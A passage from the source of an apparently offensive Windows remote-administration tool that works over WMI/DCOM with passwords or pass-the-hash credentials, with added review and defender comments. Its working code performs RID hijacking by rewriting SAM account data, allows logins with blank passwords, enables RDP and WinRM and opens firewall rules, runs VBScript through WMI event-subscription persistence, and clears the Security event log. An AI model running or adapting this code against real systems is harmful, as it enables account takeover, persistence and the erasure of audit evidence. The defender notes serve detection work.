dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 21 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL) 22 | iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) 23 | iWbemLevel1Login.RemRelease() 24 | WQL = r"""SELECT * FROM Win32_TerminalServiceSetting""" 25 | iEnumWbemClassObject = iWbemServices.ExecQuery(WQL) 26 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 27 | if int(isenable)==1: 28 | iWbemClassObject.SetAllowTSConnections(1, 1) #Enable RDP 29 | else: 30 | iWbemClassObject.SetAllowTSConnections(0, 0) # Disable RDP 31 | 32 | iEnumWbemClassObject = iWbemServices.ExecQuery(WQL) 33 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 34 | result = dict(iWbemClassObject.getProperties()) 35 | if result['AllowTSConnections']['value']==1: 36 | print("[+] Enable RDP Open Sucess") 37 | elif result['AllowTSConnections']['value']==0: 38 | print("[+] Disable RDP Sucess") 39 | iWbemServices.RemRelease() 40 | 41 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 42 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 43 | rdpport=StdRegProv.GetDWORDValue(2147483650,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp","PortNumber") 44 | print("[*] RDP Port:{}".format(rdpport.uValue)) 45 | dcom.disconnect() 46 | 47 | 48 | def rdpshadow(ip='', username='', password='',domain='',hashes='',aesKey='',shadow=0): 49 | idnumber=[-1,0,1,2,3,4] 50 | if shadow not in idnumber: 51 | print("[-] Shadow ID:0 or 1 or 2 or 3 or 4") 52 | exit() 53 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 54 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 55 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 56 | if shadow==-1: 57 | deleteshadow=StdRegProv.DeleteValue(2147483650, "Software\\Policies\\Microsoft\\Windows NT\\Terminal 
Services","Shadow") 58 | if deleteshadow.ReturnValue==0: 59 | print("[+] Delete Shadow reg key Sucess") 60 | else: 61 | shadowid = StdRegProv.SetDWORDValue(2147483650, "Software\\Policies\\Microsoft\\Windows NT\\Terminal Services","Shadow",shadow) 62 | print("[*] Set RDP Shdaow ID:{}".format(shadow)) 63 | if shadowid.ReturnValue==0: 64 | print("[+] Set RDP Shadow ID Sucess") 65 | else: 66 | print("[-] Set RDP Shadow ID Failure") 67 | dcom.disconnect() 68 | 69 | def Login_with_empty_password(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 70 | print("[*] Login with empty password Setting") 71 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 72 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 73 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 74 | if isenable==0: 75 | txt="Enable Login with empty password" 76 | limitblankpassworduse = StdRegProv.SetDWORDValue(2147483650, "SYSTEM\\CurrentControlSet\\Control\\Lsa", "limitblankpassworduse",0) 77 | else: 78 | txt="Disable Login with empty password" 79 | limitblankpassworduse = StdRegProv.SetDWORDValue(2147483650, "SYSTEM\\CurrentControlSet\\Control\\Lsa","limitblankpassworduse", 1) 80 | 81 | if limitblankpassworduse.ReturnValue==0: 82 | print("[+] {} Sucess".format(txt)) 83 | else: 84 | print("[-] {} Failure".format(txt)) 85 | dcom.disconnect() -------------------------------------------------------------------------------- /module/ridhijack.py: -------------------------------------------------------------------------------- 1 | import os 2 | import uuid 3 | import time 4 | from module import * 5 | from module import files 6 | from module import vbsrun 7 | from module import wmiconnect 8 | 9 | inipath=os.path.join(os.getcwd(),"output","regini.ini") 10 | def rid_teample_create(src_rid,target_rid,id=0): 11 | pass 12 | 13 | def hex_set(b,target_rid,isenable=0): 14 | tmp = [] 15 | result = [] 16 | for x in b: 17 | 
# --- tail of hex_set(uvalue, target_rid, isenable=...): the signature and the
# --- loop header that binds `x` lie above this chunk; only the remainder is shown.
        tmp.append(x)
        if len(tmp) == 4:
            # Four bytes collected: fold them little-endian into one DWORD.
            jj = ""
            for c in tmp[::-1]:
                jj += "%.2x" % c
            # NOTE(review): eval() on a hex string; int(jj, 16) is the direct equivalent.
            result.append(eval("0x{}".format(jj)))
            tmp = []
    # Pad the DWORD list to 80 entries before it is written back.
    for number in range(80 - len(result)):
        result.append(0)
    # NOTE(review): target_rid is command-line input fed to eval();
    # int(target_rid, 16) yields the same DWORD without evaluating user text.
    result[12]=eval("int(0x{})".format(target_rid)) # set the user's RID
    if isenable==1:
        result[14] = 532 # enable the user: 532 = enabled / 533 = disabled
    else:
        result[14]=533

    return result

def user_set(ip='', username='', password='',domain='',hashes='',aesKey='',rids="") -> None:
    """Enable (1) or disable (0) a local account by rewriting its SAM 'F' value.

    rids is "<rid-hex>,<1|0>" from the command line. The DACL on HKLM\\SAM\\SAM is
    first widened by running vbs/reg_permission.vbs through a temporary WMI event
    subscription (vbsrun.run_vbs, torn down again by vbsrun.delete); the value is
    then read and written back through StdRegProv over DCOM.

    Defender note: each step is observable — the subscription objects created in
    root\\subscription, the DACL change on HKLM\\SAM\\SAM and the write under
    SAM\\SAM\\Domains\\Account\\Users are all covered by WMI-Activity and
    registry-object auditing.
    """
    rid_sp = rids.split(",")
    if len(rid_sp)!=2:
        print("[-] --setuser ,1/0")
        # NOTE(review): terminates the whole process from inside a library function.
        exit()
    rid=rid_sp[0]
    isenable=int(rid_sp[1])
    if isenable==1:
        txt="Enable User rid:{} Sucess".format(rid)
    else:
        txt="Disable User rid:{} Sucess".format(rid)
    # Helper defined elsewhere in this file (not visible here); note that run()
    # calls it with a different argument pattern.
    rid_teample_create(rid,0,1)
    vbsid = str(uuid.uuid1())
    teamp_vbs_path = os.path.join(os.getcwd(), "vbs", "reg_permission.vbs")
    output_vbs_path = os.path.join(os.getcwd(), "output", "reg_permission.vbs")
    # NOTE(review): the read handle is never closed explicitly; a with-block would release it.
    tmp = open(teamp_vbs_path, "r", encoding="utf-8").read()
    newfile = open(output_vbs_path, "w", encoding="utf-8")
    newfile.write(tmp)
    newfile.close()
    vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, output_vbs_path, vbsid)
    # run_vbs registers a 2000 ms interval timer; wait so it can fire before delete() removes it.
    time.sleep(2.5)
    vbsrun.delete(ip, username, password, domain, hashes, aesKey, vbsid)
    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    # Released before NTLMLogin here — the reverse of the order used in userquery(); confirm intended.
    iWbemLevel1Login.RemRelease()
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
    StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
    # 2147483650 == 0x80000002 == HKEY_LOCAL_MACHINE (the HKLM constant reg_permission.vbs uses).
    # The key name is "00000" + rid, so this presumably assumes a 3-hex-digit RID — verify.
    rest = StdRegProv.GetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid_sp[0]), 'F')
    ReturnValue = rest.ReturnValue
    if int(ReturnValue) == 0:
        uvalue = rest.uValue
        result_value = hex_set(uvalue, rid,isenable=isenable)
        print(result_value)
        out = StdRegProv.SetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid), 'F',result_value)
        if int(out.ReturnValue) == 0:
            print(txt)
        else:
            print(txt.replace("Sucess","Failure"))
    else:
        print("[-] Registry permission modification failed Error Code:{}".format(ReturnValue))
    dcom.disconnect()
    # NOTE(review): second disconnect() on the same connection is redundant.
    dcom.disconnect()

def run(ip='', username='', password='',domain='',hashes='',aesKey='',ridlist="") -> None:
    """Rewrite the RID stored in one account's SAM 'F' value.

    ridlist is "<rid-hex>,<new-rid-hex>" from the command line. Same sequence as
    user_set(): DACL widening via reg_permission.vbs, then a GetBinaryValue /
    hex_set / SetBinaryValue round trip through StdRegProv.

    Defender note: a write under SAM\\SAM\\Domains\\Account\\Users by anything other
    than lsass is a high-signal registry-audit event.
    """
    rid_sp=ridlist.split(",")
    if len(rid_sp)!=2:
        print("[-] --ridhijack ,")
        # NOTE(review): terminates the whole process from inside a library function.
        exit()
    rid_teample_create(rid_sp[0],rid_sp[1])
    vbsid = str(uuid.uuid1())
    teamp_vbs_path = os.path.join(os.getcwd(), "vbs", "reg_permission.vbs")
    output_vbs_path = os.path.join(os.getcwd(), "output", "reg_permission.vbs")
    # NOTE(review): the read handle is never closed explicitly; a with-block would release it.
    tmp = open(teamp_vbs_path, "r", encoding="utf-8").read()
    newfile = open(output_vbs_path, "w", encoding="utf-8")
    newfile.write(tmp)
    newfile.close()
    vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, output_vbs_path, vbsid)
    # run_vbs registers a 2000 ms interval timer; wait so it can fire before delete() removes it.
    time.sleep(2.5)
    vbsrun.delete(ip, username, password, domain, hashes, aesKey, vbsid)
    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    iWbemLevel1Login.RemRelease()
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
    StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
    # 2147483650 == 0x80000002 == HKEY_LOCAL_MACHINE; key name assumes a 3-hex-digit RID — verify.
    rest = StdRegProv.GetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid_sp[0]), 'F')
    ReturnValue=rest.ReturnValue
    if int(ReturnValue)==0:
        uvalue=rest.uValue
        # hex_set() defaults isenable, so the enabled flag is also rewritten here — confirm intended.
        result_value=hex_set(uvalue,rid_sp[1])
        print(result_value)
        out=StdRegProv.SetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid_sp[0]), 'F', result_value)
        if int(out.ReturnValue)==0:
            print("[+] RID Hijack Sucess")
        else:
            print("[-] RID Hijack Failure ErrorCode:{}".format(int(out.ReturnValue)))
    else:
        print("[-] Registry permission modification failed Error Code:{}".format(ReturnValue))
    dcom.disconnect()
    # NOTE(review): second disconnect() on the same connection is redundant.
    dcom.disconnect()
-------------------------------------------------------------------------------- /module/userquery.py: --------------------------------------------------------------------------------
from module import *
from module import wmiconnect
from module import printReply
def userquery(ip='', username='', password='',domain='',hashes='',aesKey='') -> None:
    """Print every Win32_UserAccount instance on the target, one line per account.

    Output formatting is delegated to printReply.printReply (defined elsewhere).
    """
    print("[*] UserAccount")
    dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey)
    iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
    iWbemLevel1Login.RemRelease()
    # Unused: the ExecQuery below is what produces the output.
    win32UserAccount, _ = iWbemServices.GetObject("Win32_UserAccount")
    UserAccount = iWbemServices.ExecQuery("SELECT * from Win32_UserAccount")
    userlist=printReply.printReply(UserAccount)
    user_splist = userlist.split("\n")
    for user in range(0, len(user_splist)):
        try:
            print(user_splist[user])

        except Exception as error:
            # NOTE(review): any print() failure is silently dropped — presumably
            # meant to guard against console encoding errors; confirm.
            pass

    dcom.disconnect()

def user_rid_query(ip='', username='', password='',domain='',hashes='',aesKey='') -> None:
    """Print domain, name, Disabled flag and hex RID for each Win32_UserAccount.

    The RID is the last component of the account SID.
    """
    print("[*] User RID Query")
    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
    iWbemLevel1Login.RemRelease()
    # Unused: the ExecQuery below is what is enumerated.
    win32UserAccount, _ = iWbemServices.GetObject("Win32_UserAccount")
    iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * from Win32_UserAccount")
    while True:
        try:
            Userinfo = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
            Domain = Userinfo.Domain
            Name = Userinfo.Name
            Disabled = Userinfo.Disabled
            # NOTE(review): lstrip("0x") strips any leading '0'/'x' characters, not the
            # "0x" prefix; a RID of 0 becomes "". format(rid, "x") is the safe form.
            rid = hex(int(Userinfo.SID.split("-")[-1])).lstrip("0x")
            print("Domain:{} Name:{} Disabled:{} Rid:{}".format(Domain,Name,Disabled,rid))
        except Exception as err:
            # End of enumeration is signalled by an exception carrying WBEM_S_FALSE.
            # NOTE(review): any other exception is swallowed and the loop spins forever;
            # find(...) > 0 would also miss a marker at index 0.
            if str(err).find("WBEM_S_FALSE") > 0:
                break
    dcom.disconnect()

-------------------------------------------------------------------------------- /module/vbsrun.py: --------------------------------------------------------------------------------
from module import *
from module import wmiconnect
from module import checkError
import os

def delete(ip='', username='', password='',domain='',hashes='',aesKey='',vbsname='') -> None:
    """Remove the four root\\subscription objects run_vbs() created for vbsname.

    Deletes, in order: the ActiveScriptEventConsumer, the __EventFilter EF_<name>,
    the __IntervalTimerInstruction TI_<name> and the __FilterToConsumerBinding.
    Each result is passed through checkError.checkError (defined elsewhere).
    """
    print("[*] Removing ActiveScriptEventConsumer %s" % vbsname)
    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL)
    iWbemLevel1Login.RemRelease()
    checkError.checkError('Removing ActiveScriptEventConsumer %s' % vbsname,
                          iWbemServices.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % vbsname))

    print("[*] Removing EventFilter EF_%s" % vbsname)
    checkError.checkError('Removing EventFilter EF_%s' % vbsname,
                          iWbemServices.DeleteInstance('__EventFilter.Name="EF_%s"' % vbsname))

    # NOTE(review): the status line says FilterToConsumerBinding but this step removes
    # the IntervalTimerInstruction (see the checkError label).
    print("[*] Removing FilterToConsumerBinding %s" % vbsname)
    checkError.checkError('Removing IntervalTimerInstruction TI_%s' % vbsname,
                          iWbemServices.DeleteInstance(
                              '__IntervalTimerInstruction.TimerId="TI_%s"' % vbsname))

    # NOTE(review): the %s placeholders are never formatted — vbsname is passed to print()
    # as extra arguments and appended after the literal string.
    print("[+] DeleteInstance __FilterToConsumerBinding.Consumer=\"ActiveScriptEventConsumer.Name=\"%s\" and Filter=\"__EventFilter.Name=\"EF_%s\"",vbsname,vbsname)
    checkError.checkError('Removing FilterToConsumerBinding %s' % vbsname,
                          iWbemServices.DeleteInstance(
                              r'__FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"%s\"",'
                              r'Filter="__EventFilter.Name=\"EF_%s\""' % (
                                  vbsname, vbsname)))

    dcom.disconnect()

def run_vbs(ip='', username='', password='',domain='',hashes='',aesKey='',vbsname='',vbsid='') -> None:
    """Install a local VBScript file as a timer-driven WMI event subscription.

    vbsname is the local path of the script; vbsid names the remote objects
    ("Example" when empty). Creates an ActiveScriptEventConsumer holding the
    script text, a __IntervalTimerInstruction firing every 2000 ms, an
    __EventFilter on that timer and the __FilterToConsumerBinding joining them,
    so the script keeps running every two seconds until delete() removes it.

    Defender note: this is the classic WMI filter/consumer/binding persistence
    pattern; the object creations are logged by the WMI-Activity operational
    channel and by Sysmon events 19/20/21.
    """
    if os.path.exists(vbsname)==False:
        print("[-] not found vbs:{}".format(vbsname))
        # NOTE(review): terminates the whole process from inside a library function.
        exit()

    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL)
    iWbemLevel1Login.RemRelease()
    # NOTE(review): the triple-quoted text below is a bare string expression, not a
    # comment — dead code apparently left over from the example this was adapted from.
    '''
    if __options.action.upper() == 'REMOVE':
        checkError('Removing ActiveScriptEventConsumer %s' % vbsname,
                   iWbemServices.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % vbsname))

        checkError('Removing EventFilter EF_%s' % vbsname,
                   iWbemServices.DeleteInstance('__EventFilter.Name="EF_%s"' % vbsname))

        checkError('Removing IntervalTimerInstruction TI_%s' % vbsname,
                   iWbemServices.DeleteInstance(
                       '__IntervalTimerInstruction.TimerId="TI_%s"' % vbsname))

        checkError('Removing FilterToConsumerBinding %s' % vbsname,
                   iWbemServices.DeleteInstance(
                       r'__FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"%s\"",'
                       r'Filter="__EventFilter.Name=\"EF_%s\""' % (
                           vbsname, vbsname)))
    else:
    '''
    print("[*] reading vbs:{}".format(vbsname))
    # NOTE(review): the file handle is never closed explicitly.
    vbsdata=open(vbsname,"r",encoding="utf-8").read()
    print("[*] Adding ActiveScriptEventConsume")
    # From here on vbsname is reused as the remote object name, no longer the path.
    if vbsid=='':
        vbsname="Example"
    else:
        vbsname=vbsid
    activeScript, _ = iWbemServices.GetObject('ActiveScriptEventConsumer')
    activeScript = activeScript.SpawnInstance()
    activeScript.Name = vbsname
    activeScript.ScriptingEngine = 'VBScript'
    # Binary SID S-1-5-32-544 (BUILTIN\Administrators) — the same bytes reg_permission.vbs uses.
    activeScript.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]
    activeScript.ScriptText = vbsdata
    checkError.checkError('Adding ActiveScriptEventConsumer %s' % vbsname,
                          iWbemServices.PutInstance(activeScript.marshalMe()))


    print("[*] Adding IntervalTimerInstruction")
    wmiTimer, _ = iWbemServices.GetObject('__IntervalTimerInstruction')
    wmiTimer = wmiTimer.SpawnInstance()
    wmiTimer.TimerId = 'TI_%s' % vbsname
    # Milliseconds between __TimerEvent firings; callers sleep 2.5 s before delete().
    wmiTimer.IntervalBetweenEvents = int(2000)
    # wmiTimer.SkipIfPassed = False
    checkError.checkError('Adding IntervalTimerInstruction',
                          iWbemServices.PutInstance(wmiTimer.marshalMe()))

    print("[*] Adding EventFilter EF_%s"% vbsname)
    eventFilter, _ = iWbemServices.GetObject('__EventFilter')
    eventFilter = eventFilter.SpawnInstance()
    eventFilter.Name = 'EF_%s' % vbsname
    eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]
    eventFilter.Query = 'select * from __TimerEvent where TimerID = "TI_%s" ' % vbsname
    eventFilter.QueryLanguage = 'WQL'
    eventFilter.EventNamespace = r'root\subscription'
    checkError.checkError('Adding EventFilter EF_%s' % vbsname,
                          iWbemServices.PutInstance(eventFilter.marshalMe()))

    print("[+] Adding FilterToConsumerBinding")
    filterBinding, _ = iWbemServices.GetObject('__FilterToConsumerBinding')
    filterBinding = filterBinding.SpawnInstance()
    filterBinding.Filter = '__EventFilter.Name="EF_%s"' % vbsname
    filterBinding.Consumer = 'ActiveScriptEventConsumer.Name="%s"' % vbsname
    filterBinding.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]

    checkError.checkError('Adding FilterToConsumerBinding',
                          iWbemServices.PutInstance(filterBinding.marshalMe()))

    dcom.disconnect()
-------------------------------------------------------------------------------- /module/winrm_enable.py: --------------------------------------------------------------------------------
from module import *
from module import wmiconnect

def winrm_enable(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0) -> None:
    """Start (isenable=1) or stop (isenable=0) the WinRM service over WMI.

    When starting, it additionally enables the WINRM-HTTP-In-TCP and
    WINRM-HTTP-In-TCP-PUBLIC firewall rules through root\\StandardCimv2; hosts
    without that namespace only get the service change.

    Defender note: service start/stop and firewall rule changes performed through
    a remote WMI session are visible in Win32_Service / WinRM operational logging
    and in Windows Firewall rule-change auditing.
    """
    if int(isenable)!=1 and int(isenable)!=0:
        print("[-] Pluse Query Help,Thanks....")
        # NOTE(review): terminates the whole process from inside a library function.
        exit()
    print("[*] Enable/Disable winrm")
    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
    WQL = 'select * from Win32_Service where Name="WinRM"'
    iEnumWbemClassObject = iWbemServices.ExecQuery(WQL)
    iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
    if int(isenable)==1:
        # NOTE(review): StartService() is invoked a second time whenever the first call
        # returns non-zero; capture ReturnValue once, as the stop branch does.
        # 0 and 10 are both treated as success (10 presumably "already running" — confirm).
        if iWbemClassObject.StartService().ReturnValue==0 or iWbemClassObject.StartService().ReturnValue==10:
            print("[+] winrm Service Start")
    elif int(isenable)==0:
        stopcode=iWbemClassObject.StopService().ReturnValue
        print("[*] WinRm Stop Service Return Code:{}".format(stopcode))
        # 0 and 5 are both reported as a successful stop — confirm the meaning of 5 for this service.
        if stopcode==0 or stopcode==5:
            print("[+] winrm Service Stop")


    if int(isenable) == 1:
        print("[*] Enable Winrm Service")
        InstanceIDlist=["WINRM-HTTP-In-TCP","WINRM-HTTP-In-TCP-PUBLIC"]
        try:
            iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/StandardCimv2', NULL, NULL)
        except Exception as error:
            # NOTE(review): for any other login error iWbemServices still points at the
            # root/cimv2 service, and the MSFT_* queries below will fail on it.
            if "WBEM_E_INVALID_NAMESPACE" in str(error):
                iWbemServices=None

        if iWbemServices!=None:
            for InstanceIDName in InstanceIDlist:
                try:
                    WQL2 = "SELECT * FROM MSFT_NetProtocolPortFilter where InstanceID = \"{}\"".format(InstanceIDName)
                    firewall_list = iWbemServices.ExecQuery(WQL2)
                    while True:
                        pEnum = firewall_list.Next(0xffffffff, 1)[0]
                        InstanceID = pEnum.InstanceID
                        print("[*] Enable Firewall Rule InstanceID:{}".format(InstanceID))
                        MSFT_NetProtocolPortFilter = iWbemServices.ExecQuery(
                            "select * from MSFT_NetFirewallRule where InstanceID=\"{}\"".format(InstanceID)).Next(0xffffffff, 1)[0]
                        # Unused.
                        result = dict(MSFT_NetProtocolPortFilter.getProperties())
                        Enabled = MSFT_NetProtocolPortFilter.Enabled
                        # Enabled == 2 is treated as "disabled" and rewritten to 1 — confirm against
                        # the MSFT_NetFirewallRule value map.
                        if Enabled == 2:
                            firewall_Instance = MSFT_NetProtocolPortFilter.SpawnInstance()
                            firewall_Instance.Enabled = 1
                            # NOTE(review): the placeholder strings below (CreationClassName,
                            # DisplayName, ...) are sent to the host in the PutInstance call;
                            # verify which of them the provider actually applies.
                            firewall_Instance.CreationClassName = "fuckyouaasasasaasas"
                            firewall_Instance.PolicyRuleName = ""
                            firewall_Instance.SystemCreationClassName = ""
                            firewall_Instance.SystemName = ""
                            # allow=2, allowBypass=3, Block=4
                            firewall_Instance.Action = 2
                            firewall_Instance.Caption = ""
                            firewall_Instance.CommonName = ""
                            firewall_Instance.ConditionListType = 3
                            firewall_Instance.Description = ""
                            firewall_Instance.Direction = 1
                            firewall_Instance.DisplayGroup = ""
                            firewall_Instance.DisplayName = "AAAAAAAAAAAAAAA"
                            firewall_Instance.EdgeTraversalPolicy = 0
                            firewall_Instance.ElementName = " "
                            firewall_Instance.EnforcementStatus = [0]
                            firewall_Instance.ExecutionStrategy = 2
                            firewall_Instance.LocalOnlyMapping = False
                            firewall_Instance.LooseSourceMapping = False
                            firewall_Instance.Mandatory = ""
                            firewall_Instance.Owner = ""
                            firewall_Instance.PolicyDecisionStrategy = 2
                            firewall_Instance.PolicyKeywords = ""
                            firewall_Instance.PolicyRoles = ""
                            firewall_Instance.PolicyStoreSource = "PersistentStore"
                            firewall_Instance.PolicyStoreSourceType = 1
                            firewall_Instance.PrimaryStatus = 1
                            firewall_Instance.Profiles = 0
                            firewall_Instance.RuleGroup = ""
                            firewall_Instance.RuleUsage = ""
                            firewall_Instance.SequencedActions = 3
                            firewall_Instance.Status = "The rule was parsed successfully from the store."
                            firewall_Instance.StatusCode = 65536
                            iWbemServices.PutInstance(firewall_Instance.marshalMe())
                except Exception as error:
                    # End of enumeration is signalled by an exception carrying WBEM_S_FALSE.
                    # NOTE(review): this `break` leaves the *for* loop (the try wraps the while),
                    # so only the first InstanceID in InstanceIDlist is ever processed;
                    # `continue` is what advances to the next rule.
                    if "WBEM_S_FALSE" in str(error):
                        break
                    else:
                        print(error)
                        # NOTE(review): exits without dcom.disconnect().
                        exit(1)
            print("[+] Enable WinRm Firewall allow Rule ok")
        else:
            print("[*] The OS possible:Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace\nUnable to configure firewall rules")
    dcom.disconnect()
-------------------------------------------------------------------------------- /module/wmiconnect.py: --------------------------------------------------------------------------------
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcom.wmi import IWbemServices
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
from impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
import logging
import sys

def wmiconnect(ip='', username='', password='',domain='',hashes='',aesKey='') -> tuple[DCOMConnection, wmi.IWbemLevel1Login]:
    """Open a DCOM connection to ip and return (dcom, IWbemLevel1Login).

    hashes is "LM:NT" or empty/None; Kerberos is always disabled (doKerberos=False).
    On any failure the error is logged and the process exits with status 1 — there
    is no error return for callers to handle.
    """
    if hashes!=None and len(hashes) > 0:
        lmhash, nthash = hashes.split(':')
    else:
        lmhash, nthash = ("", "")

    # Unused.
    result=""
    # smbConnection = SMBConnection(ip, ip)
    try:
        dcom = DCOMConnection(ip, username, password, domain, lmhash, nthash, aesKey, oxidResolver=True,doKerberos=False, kdcHost=None)
        iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        return (dcom,iWbemLevel1Login)

    except (Exception, KeyboardInterrupt) as e:
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        logging.error(str(e))
        # if smbConnection is not None:
        #     smbConnection.logoff()
        # NOTE(review): if DCOMConnection() itself raised, `dcom` is unbound here and this
        # line raises NameError, hiding the original error from the user.
        dcom.disconnect()
        sys.stdout.flush()
        sys.exit(1)

    # NOTE(review): unreachable — the try block returns and the except block exits.
    dcom.disconnect()
    sys.exit(1)
-------------------------------------------------------------------------------- /output/clearEventLog.vbs: --------------------------------------------------------------------------------
' Generated copy of vbs/clearEventLog.vbs with the log name filled in ("Security").
' The moniker requests the Backup and Security privileges ClearEventLog needs.
' Defender note: clearing the Security log is itself audited (event 1102).
Set LogFileSet = GetObject("winmgmts:{(Backup,Security)}").ExecQuery("select * from Win32_NTEventLogFile where LogfileName='Security'")

for each Logfile in LogFileSet
    RetVal = LogFile.ClearEventlog()
    if RetVal = 0 then WScript.Echo "Log Cleared"
next
-------------------------------------------------------------------------------- /output/dele_file.vbs: --------------------------------------------------------------------------------
' Generated copy of vbs/dele_file.vbs: removes the <id>.txt / <id>er_.txt pair
' that a previous command run left under C:\Windows\Temp.
Set file=CreateObject("Scripting.FileSystemObject")
file.DeleteFile("C:\Windows\Temp\2cbd1faa-ed4d-11ed-ae66-68545aac985a.txt")
file.DeleteFile("C:\Windows\Temp\2cbd1faa-ed4d-11ed-ae66-68545aac985aer_.txt")
-------------------------------------------------------------------------------- /output/delete_file.vbs: --------------------------------------------------------------------------------
' Generated copy of vbs/delete_file.vbs: the path is passed base64-encoded and
' decoded on the host (avoids the non-ASCII path encoding problem noted in the README).
Function Base64Decode(ByVal vCode)
    ' MSXML's bin.base64 node type does the decoding; the result is a byte array.
    Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
End Function

Function Stream_BinaryToString(Binary)
    ' Round-trip the bytes through an ADODB.Stream to read them back as UTF-8 text.
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.Type = 1
    BinaryStream.Open
    BinaryStream.Write Binary
    BinaryStream.Position = 0
    BinaryStream.Type = 2
    ' All Format => utf-16le - utf-8 - utf-16le
    BinaryStream.CharSet = "utf-8"
    Stream_BinaryToString = BinaryStream.ReadText
    Set BinaryStream = Nothing
End Function


Set file=CreateObject("Scripting.FileSystemObject")
' (the DeleteFile call that ends this script lies past this chunk)
